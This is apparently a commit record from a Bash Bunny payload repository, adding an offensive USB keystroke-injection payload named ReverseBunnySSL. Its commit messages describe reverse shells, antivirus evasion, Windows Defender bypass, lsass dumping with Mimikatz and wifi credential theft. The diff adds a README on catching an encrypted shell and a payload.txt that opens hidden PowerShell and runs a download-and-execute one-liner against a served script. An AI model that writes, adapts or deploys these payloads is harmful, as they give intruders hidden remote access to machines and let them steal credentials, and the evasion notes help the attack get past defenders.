Uploaded ReverseBunnySSL (#520)

* Uploaded ReverseBunny

Obfuscated reverse shell via powershell

* Uploaded WifiSnatch

Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇

* Update ReverseBunny.txt

Changed payload to evade Windows Defender

* Update payload.txt

Added new "Eject Method" - props to Night(9o3)

* Update README.md

* Deleted ReverseBunny.txt

Deleted because of higher risk to get caught by AV

* Updated ReverseBunny to version 1.2

Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design

* Updated ReverseBunny to version 1.2

Updated README for ReverseBunny update

* Updated payload

fixed some stupid left overs <3

* Uploaded pingUinBunny

a reverse shell using icmp

* Delete payloads/library/remote_access/switch1 directory

* Uploaded pingUinBunny

A reverse shell using icmp

* Update README.md

* Update README.md

* Updated to PingZhell

* Update Bunny.pl

* Update README.md

* Update README.md

* Update payload.txt

* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl

* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1

* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md

* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt

* Update payload.txt

* Update README.md

* Update README.md

* Update Bunny.pl

* Created ProcDumpBunny

Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz

* Update README.md

* Update payload.txt

* Updated ReverseBunny

Fixed wrong DELAY commands

* Updated PingZhellBunny

Fixed wrong DELAY commands

* Updated WifiSnatch

Fixed multiple mistakes

* Uploaded HashDumpBunny

Use your BashBunny to dump the user hashes of your target - similar to the msf post-module.
The script was obfuscated with multiple layers, so don't be confused.
If you don't trust this script, run it within a save testing space - which should be best practice anyways ;)

* added example picture

* Update README.md

* Uploaded SessionBunny

Utilize SessionGopher (Slightly modified) to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP.
Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords.

Afterwards decide which is important and what you want to save onto your BashBunny.

* Uploaded SessionBunny

Utilize the famous, here slightly modified SessionGopher script, to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP.
Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords.

Decide which inforamtion you wanna take with you - save it onto your BashBunny!

* Update README.md

* Delete SessionBunny directory

* Uploaded MiniDumpBunny

Dump lsass with this rewritten and for BashBunny adapted version of Powersploits Out-MiniDump.

* Update README.md

added disclaimer

* Update README.md

* Update README.md

* Update README.md

* Uploaded ReverseBunnySSL

* Update README.md

* Update README.md

* Update payload.txt

* Update README.md

payloads/library/remote_access/ReverseBunnySSL/README.md

@@ -0,0 +1,30 @@
+**Title: ReverseBunnySSL**
+
+<p>Author: 0iphor13<br>
+OS: Windows<br>
+Version: 1.2<br>
+For input and inspiration - Thanks to: Cribbit, sebkinne</p>
+
+**What is ReverseBunnySSL?**
+#
+<p>ReverseBunnySSL gets you remote access to your target in seconds.<br>
+Unlike ReverseBunny, ReverseBunnySSL offers encrypted traffic via OpenSSL.</p>
+
+
+**Instruction:**
+<p>!Insert the IP of your attacking machine & PORT into the payload.txt!<br>
+1. Create key.pem & cert.pem like so: <br>
+	> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br>
+	It will ask for information about the certificate - Insert whatever you want.<br>
+
+2. For catching the shell you need to start a listener, which supports encrypted traffic.<br>
+I recommend openssl itself or ncat - Example syntax for both:<br>
+	> `openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]` <br>
+	> `ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem`</p>
+
+3. Plug in Bunny, it will create a web server, and uses Invoke-Expression to execute the shell.
+
+**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
+
+![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

payloads/library/remote_access/ReverseBunnySSL/payload.txt

@@ -0,0 +1,44 @@
+#!/bin/bash
+#
+# Title:         ReverseBunnySSL
+# Description:   Get remote access, using an obfuscated powershell reverse shell.
+# Author:        0iphor13
+# Version:       1.2
+# Category:      Remote_Access
+# Attackmodes:   HID, RNDIS_ETHERNET
+
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET HID
+
+GET SWITCH_POSITION
+GET HOST_IP
+
+cd /root/udisk/payloads/$SWITCH_POSITION/
+
+# starting server
+LED SPECIAL
+
+# disallow outgoing dns requests so the server is accessible immediately
+iptables -A OUTPUT -p udp --dport 53 -j DROP
+python -m SimpleHTTPServer 80 &
+
+# wait until port is listening
+while ! nc -z localhost 80; do sleep 0.2; done
+
+#Opens hidden powershell instance
+Q DELAY 1500
+Q GUI r
+Q DELAY 500
+Q STRING "powershell -NoP -NonI -w hidden"
+Q DELAY 500
+Q ENTER
+
+Q DELAY 500
+
+#Insert attacking IP & port below
+Q STRING "\$I='0.0.0.0';\$P=4444;"
+Q DELAY 250
+Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
+Q DELAY 200
+Q ENTER
+LED FINISH